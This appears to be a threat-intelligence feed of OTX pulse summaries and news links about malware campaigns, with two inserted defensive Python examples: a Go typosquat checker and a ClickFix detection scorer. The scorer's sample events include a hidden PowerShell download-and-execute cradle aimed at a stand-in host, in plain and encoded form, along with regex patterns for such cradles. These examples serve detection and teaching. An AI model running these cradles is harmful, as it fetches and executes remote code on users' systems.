Beware of Weaponized Recruitment Emails that Deliver BeaverTail and Tropidoor Malware https://cybersecuritynews.com/beware-of-weaponized-recruitment-emails/ #CyberSecurityNews #cybersecuritynews #Threats #malware
US, Allies Warn of Threat Actors Using ‘Fast Flux’ to Hide Server Locations – Source: www.securityweek.com https://ciso2ciso.com/us-allies-warn-of-threat-actors-using-fast-flux-to-hide-server-locations-source-www-securityweek-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #Malware&Threats #securityweekcom #securityweek #fastflux #guidance #CISA #DNS
Sophisticated Malware Campaign Targeting Job Seekers
Pulse ID: 67f0999050802d6d044741a2
Pulse Link: https://otx.alienvault.com/pulse/67f0999050802d6d044741a2
Pulse Author: cryptocti
Created: 2025-04-05 02:46:40
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Beware! Weaponized Job Recruitment Emails Spreading BeaverTail and Tropidoor Malware https://gbhackers.com/beware-weaponized-job-recruitment-emails/ #CyberSecurityNews #cybersecurity #Malware #Email
Beware of Clickfix: ‘Fix Now’ and ‘Bot Verification’ Lures Deliver and Execute Malware https://gbhackers.com/beware-of-clickfix-fix-now-and-bot-verification/ #CyberSecurityNews #cybersecurity #PowerShell #Malware
DeepSeek-R1 Prompts Abused to Generate Advanced Malware and Phishing Sites https://gbhackers.com/deepseek-r1-prompts-abused-to-generate-advanced-malware/ #CyberSecurityNews #cybersecurity #DeepSeek #Phishing #Malware
Typosquatted Go Packages Deliver Malware Loader Targeting Li...
A malicious campaign is targeting the Go ecosystem with typosquatted packages that install hidden loader malware on Linux and macOS systems. The threat actor has published at least seven packages impersonating popular Go libraries, using array-based string obfuscation to hide malicious commands. The packages download and execute remote scripts that install an ELF file named f0eee999, which exhibits minimal initial malicious behavior. The campaign specifically targets UNIX-like environments, placing developers at risk. Multiple domains and fallback infrastructure suggest a persistent and adaptable threat actor. Developers are advised to implement real-time scanning tools, code audits, and careful dependency management to mitigate the risk of supply chain compromises.
Pulse ID: 67efc6e6d18160ba914fc662
Pulse Link: https://otx.alienvault.com/pulse/67efc6e6d18160ba914fc662
Pulse Author: AlienVault
Created: 2025-04-04 11:47:50
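The typosquatting described in this pulse, as an added example that is not code from AlienVault or from the referenced research: a Python checker that parses the require list of a go.mod file and flags module paths that sit within a small edit distance of a trusted allow list, which is how a near-miss name such as a dropped or doubled letter shows up before the package is ever built. The trusted module list, the sample go.mod contents (including its versions) and the distance threshold are assumptions constructed for the demonstration.

```python
import re

# Allow list of module paths the team has vetted (assumption for this example;
# in practice, generate it from the modules already pinned in go.sum / go.mod).
TRUSTED_MODULES = [
    "github.com/gorilla/mux",
    "github.com/sirupsen/logrus",
    "golang.org/x/crypto",
    "github.com/spf13/cobra",
]

# Constructed go.mod with two near-miss module paths and one unknown internal module.
SAMPLE_GO_MOD = """module example.com/app

go 1.22

require (
	github.com/gorilla/mux v1.8.1
	github.com/gorila/mux v1.8.1
	github.com/sirupsen/logrus v1.9.3
	github.com/sirupsen/logrrus v1.9.3 // indirect
	golang.org/x/crypto v0.21.0
	example.com/internal/tooling v0.1.0
)
"""

# Matches "<module path> v<version>" inside a require block or a single-line require.
REQUIRE_LINE = re.compile(r"^\s*(?:require\s+)?([A-Za-z0-9._~\-/]+)\s+v[0-9]\S*")


def edit_distance(a, b):
    """Levenshtein distance with a single rolling row (O(len(b)) memory)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_require(go_mod_text):
    """Return the module paths listed in require directives, comments stripped."""
    modules, in_block = [], False
    for raw in go_mod_text.splitlines():
        line = raw.split("//", 1)[0].strip()
        if not line:
            continue
        if line.startswith("require ("):
            in_block = True
            continue
        if in_block and line == ")":
            in_block = False
            continue
        if in_block or line.startswith("require "):
            m = REQUIRE_LINE.match(line)
            if m:
                modules.append(m.group(1))
    return modules


def check_go_mod(go_mod_text, trusted, max_distance=2):
    """Classify each required module as trusted, typosquat_candidate or unknown."""
    trusted_lc = {t.lower(): t for t in trusted}
    findings = []
    for mod in parse_require(go_mod_text):
        key = mod.lower()
        if key in trusted_lc:
            findings.append({"module": mod, "status": "trusted", "nearest": mod, "distance": 0})
            continue
        nearest = min(trusted_lc, key=lambda t: edit_distance(key, t))
        dist = edit_distance(key, nearest)
        # A small distance to a vetted name is the typosquat signature; a large
        # distance just means the module is not on the list yet.
        status = "typosquat_candidate" if dist <= max_distance else "unknown"
        findings.append({"module": mod, "status": status,
                         "nearest": trusted_lc[nearest], "distance": dist})
    return findings


if __name__ == "__main__":
    for finding in check_go_mod(SAMPLE_GO_MOD, TRUSTED_MODULES):
        print(f"{finding['status']:20} {finding['module']}  "
              f"(nearest: {finding['nearest']}, distance {finding['distance']})")
```

Run it against a real go.mod by reading the file into `check_go_mod`; anything reported as `typosquat_candidate` deserves a look at the module's source before `go build` runs its dependencies, and `unknown` entries are the candidates for adding to the allow list after review.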
Deobfuscating APT28's HTA Trojan: A Deep Dive into VBE Techniques & Multi-Layer Obfuscation
This analysis delves into APT28's cyber espionage campaign targeting Central Asia and Kazakhstan diplomatic relations, focusing on their HTA Trojan. The malware employs advanced obfuscation techniques, including VBE (VBScript Encoded) and multi-layer obfuscation. The investigation uses x32dbg debugging to decode the obfuscated code, revealing a custom map algorithm for character deobfuscation. The process involves decoding strings using embedded characters from Windows vbscript.dll. The analysis identifies the use of Microsoft's Windows Script Encoder (screnc.exe) to create VBE files. By employing various deobfuscation techniques, including a Python script, the final malware sample is extracted and analyzed, showcasing APT28's evolving tactics in cyber espionage.
Pulse ID: 67efc6e712b49d46c1423ca9
Pulse Link: https://otx.alienvault.com/pulse/67efc6e712b49d46c1423ca9
Pulse Author: AlienVault
Created: 2025-04-04 11:47:51
Silent Credit Card Thief Uncovered
A sophisticated credit card skimming campaign dubbed 'RolandSkimmer' has been discovered, targeting users in Bulgaria. The attack utilizes malicious browser extensions across Chrome, Edge, and Firefox, initiated through a deceptive LNK file. The malware employs obfuscated scripts to establish persistent access, harvesting and exfiltrating sensitive financial data. The attack workflow involves system reconnaissance, downloading additional malicious files, and injecting scripts into web pages. The threat actor uses unique identifiers to track victims and employs sophisticated techniques to evade detection. The campaign demonstrates the evolving nature of web-based credit card skimming threats, highlighting the need for enhanced security measures against LNK-based attacks and unverified browser extensions.
Pulse ID: 67efc6e92fbd533808f09435
Pulse Link: https://otx.alienvault.com/pulse/67efc6e92fbd533808f09435
Pulse Author: AlienVault
Created: 2025-04-04 11:47:53
Russian-Speaking Threat Actor Abuses Cloudflare & Telegram in Phishing Campaign
A Russian-speaking threat actor has launched a new phishing campaign using Cloudflare-branded pages themed around DMCA takedown notices. The attack abuses the ms-search protocol to deliver malicious LNK files disguised as PDFs. Once executed, the malware communicates with a Telegram bot to report the victim's IP address before connecting to Pyramid C2 servers. The campaign leverages Cloudflare Pages and Workers services to host phishing pages, and uses an open directory to store malicious files. The infection chain includes PowerShell and Python scripts, with incremental changes in tactics to evade detection. The actors' infrastructure spans multiple domains and IP addresses, primarily using Cloudflare's network.
Pulse ID: 67efc6ed5285702a3440969a
Pulse Link: https://otx.alienvault.com/pulse/67efc6ed5285702a3440969a
Pulse Author: AlienVault
Created: 2025-04-04 11:47:57
Where to Find Aspiring Hackers
This analysis delves into Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as 'Coquettte' and their ties to the Horrid hacking group, a loosely organized cybercriminal collective. The investigation reveals a fake cybersecurity website, cybersecureprotect[.]com, which exposed its malicious infrastructure due to an OPSEC failure. Coquettte's activities include distributing malware, keyloggers, and trojans through Proton66's infrastructure. The research also uncovers other projects operated by this actor, including a website hosting guides for illegal activities. The analysis provides technical details of Coquettte's malware infrastructure and explores Proton66's role as a breeding ground for amateur threat actors.
Pulse ID: 67efe859080e7d3823c1d41e
Pulse Link: https://otx.alienvault.com/pulse/67efe859080e7d3823c1d41e
Pulse Author: AlienVault
Created: 2025-04-04 14:10:33
APT Targets South Korea with Deceptive PDF Lures
The Kimsuky APT group, also known as Black Banshee, has been actively targeting South Korean government entities using evolving tactics. Two distinct campaigns were uncovered, both utilizing government-themed PDF documents as lures. The infection chain begins with a phishing email containing a malicious LNK file attachment, which drops an obfuscated VBA script. This script then deploys additional files, including a PDF and a ZIP containing malicious components. The attacks involve sophisticated techniques such as Base64 encoding, obfuscation, and VM-aware evasion. The malware's functionalities include data exfiltration, cryptocurrency wallet theft, browser data extraction, keylogging, and establishing C2 communication. The campaigns demonstrate the group's continuous efforts to compromise South Korean targets using deceptive tactics and multi-stage malware.
Pulse ID: 67efe85af4503af2018d414e
Pulse Link: https://otx.alienvault.com/pulse/67efe85af4503af2018d414e
Pulse Author: AlienVault
Created: 2025-04-04 14:10:34
Cyberattacks by AI agents are coming
Agents could make it easier and cheaper for criminals to hack systems at scale. We need to be ready.
https://www.technologyreview.com/2025/04/04/1114228/cyberattacks-by-ai-agents-are-coming
Proofpoint: Call It What You Want: Threat Actor Delivers Highly Targeted Multistage Polyglot Malware https://www.proofpoint.com/us/blog/threat-insight/call-it-what-you-want-threat-actor-delivers-highly-targeted-multistage-polyglot @proofpoint #cybersecurity #Infosec #malware #phishing
Netskope: New Evasive Campaign Delivers LegionLoader via Fake CAPTCHA & CloudFlare Turnstile https://www.netskope.com/blog/new-evasive-campaign-delivers-legionloader-via-fake-captcha-cloudflare-turnstile #cybersecurity #infosec #Cloudflare #phishing #malware
Proactive ClickFix Threat Hunting with Hunt.io
ClickFix is a browser-based delivery technique that uses deceptive prompts and clipboard hijacking to trick users into executing malicious commands. Cybercriminals and advanced actors employ this method to deploy malware, primarily information stealers. The technique involves luring users with fake system alerts or CAPTCHA challenges, then silently staging payloads for execution. The article describes how Hunt.io's research team used custom queries to identify web infrastructure associated with ClickFix delivery, uncovering multiple live domains serving malicious content. Examples include a Bitcoin-themed domain posing as Cloudflare WAF to deliver Lumma and CryptBot malware, a page targeting Zoho Office Suite credentials, and a compromised website abusing PowerShell. The report emphasizes the growing traction of ClickFix as a low-friction method for malware delivery and credential harvesting.
Pulse ID: 67ef854620c41c3fd65378db
Pulse Link: https://otx.alienvault.com/pulse/67ef854620c41c3fd65378db
Pulse Author: AlienVault
Created: 2025-04-04 07:07:50
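The ClickFix chain described in this pulse (a hidden-window PowerShell launched from the Run dialog, a download cradle, and the reassuring "verification" comment the lure appends to the pasted command) as an added example that is not code from Hunt.io or from the pulse: a Python scoring function run over process-creation events. The event records, field names, weights and threshold are constructed for the demonstration and would need tuning against real Sysmon Event ID 1 or Windows 4688 data before use as a detection.

```python
import base64
import re

# Interpreters a ClickFix lure tells the victim to paste into Win+R or the File
# Explorer address bar; either route starts the process under explorer.exe.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "wscript.exe", "cscript.exe"}

CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|curl|certutil)\b", re.I)
QUIET_RE = re.compile(r"-(w|windowstyle)\s+h(idden)?\b|-nop\b|-noprofile\b", re.I)
ENCODED_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# The lure ends the command with a comment so the pasted text reads as harmless.
VERIFY_RE = re.compile(r"#.*(not a robot|verification|captcha|verify)", re.I)
URL_RE = re.compile(r"https?://", re.I)

# Weights are an assumption for the example; the verification comment is the
# most specific indicator, the others are common in legitimate admin scripting.
WEIGHTS = {
    "lolbin_from_explorer": 2,
    "quiet_launch_flags": 2,
    "encoded_command": 1,
    "download_cradle": 2,
    "remote_url": 1,
    "fake_verification_comment": 4,
}

# Constructed sample: two ClickFix-style launches and two benign PowerShell starts.
ENCODED_PAYLOAD = base64.b64encode(
    "iex (irm https://lure.example/x)".encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"id": "evt1", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -c "iex (irm http://lure.example/verify.ps1)" '
                     "# I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"id": "evt2", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -ec " + ENCODED_PAYLOAD},
    {"id": "evt3", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'},
    {"id": "evt4", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def score_event(event):
    """Score one process-creation event; returns (score, matched indicator names)."""
    cmd = event["command_line"]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded  # scan the decoded payload too
    hits = []
    if image in LOLBINS and parent == "explorer.exe":
        hits.append("lolbin_from_explorer")
    if QUIET_RE.search(cmd):
        hits.append("quiet_launch_flags")
    if decoded:
        hits.append("encoded_command")
    if CRADLE_RE.search(text):
        hits.append("download_cradle")
    if URL_RE.search(text):
        hits.append("remote_url")
    if VERIFY_RE.search(text):
        hits.append("fake_verification_comment")
    return sum(WEIGHTS[h] for h in hits), hits


def triage(events, threshold=5):
    """Return (id, score, hits) for events at or above the threshold, in input order."""
    results = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            results.append((event["id"], score, hits))
    return results


if __name__ == "__main__":
    for event_id, score, hits in triage(SAMPLE_EVENTS):
        print(event_id, score, ", ".join(hits))
```

The explorer.exe parent on its own is noise (every user who opens a terminal from the Start menu produces it), which is why the benign events stay below the threshold; the combination with a download cradle, and above all the verification comment, is what separates the pasted lure from an administrator's script.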
Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)
A critical security vulnerability, CVE-2025-22457, affecting Ivanti Connect Secure VPN appliances has been actively exploited since mid-March 2025. The vulnerability allows remote code execution through a buffer overflow. Two new malware families, TRAILBLAZE and BRUSHFIRE, have been deployed along with the previously known SPAWN ecosystem. The suspected China-nexus espionage actor UNC5221 is believed to be behind the attacks. Post-exploitation activities include the use of a shell script dropper, deployment of various malware components, and attempts to evade detection by modifying the Integrity Checker Tool. Organizations are urged to immediately patch their systems and monitor for suspicious activity.
Pulse ID: 67ef85475bfef03602225985
Pulse Link: https://otx.alienvault.com/pulse/67ef85475bfef03602225985
Pulse Author: AlienVault
Created: 2025-04-04 07:07:51
New malware "#CoffeeLoader" disguises itself as ASUS software for gaming PCs. Particularly tricky: part of the malicious code hides in the graphics card's memory. #ASUS #Malware https://winfuture.de/news,150116.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia
North Korean threat actors are back - and scaling up. The #Lazarus Group is expanding its npm malware campaign with new RAT loaders, hex obfuscation, fresh aliases, and over 5,600 downloads across 11 packages.
Our latest research: https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket #JavaScript #malware